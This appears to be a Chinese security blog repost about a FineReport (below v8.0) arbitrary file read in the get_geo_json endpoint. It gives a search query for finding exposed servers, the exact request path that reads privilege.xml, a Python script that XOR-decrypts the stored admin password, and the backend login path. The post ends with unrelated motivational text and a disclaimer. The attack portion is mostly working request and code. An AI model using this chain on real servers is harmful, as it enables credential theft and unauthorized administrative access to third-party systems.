漏洞描述
漏洞影响
FineReport < v8.0网络测绘
app="帆软-FineReport"漏洞利用
漏洞路径:读取账户密码
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
解密脚本(python)
cipher = '___0022007c0039003b005100e3' #密文PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码Password = ""cipher = cipher[3:] #截断三位后for i in range(int(len(cipher) / 4)):c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]Password = Password + chr(c2)print (Password)
访问后台系统进行登陆
/WebReport/ReportServer?op=fs工具自动化检测及解密
🍻🍻🍻
🍻🍻🍻
失败是成功之母,只有经历过挫折,才能更好地迎接胜利。每一个不曾起舞的日子,都是对生命的辜负。无论现在多么的不开心,你要相信,明天会比今天更好。坚持下去,梦想会实现的。生活总会给你另一个机会,这个机会叫明天。当你感到无助的时候,请记得,还有一个人叫自己。永远不要放弃你真正想要的东西。等待虽难,但后悔更甚。不要抱怨生活给了你太多的磨难,不必抱怨生命中有太多的曲折。每一段经历都是财富,不论好坏。只要你努力,梦想就会实现。生命不止,奋斗不息。不要害怕失败,因为每一次失败都是迈向成功的一步。无论生活多么艰难,你要做的就是坚持下去。成功的秘诀在于坚持不懈。你要相信,黑暗的尽头一定是光明。
原文始发于微信公众号(南街老友):帆软FineReport报表get_geo_json任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论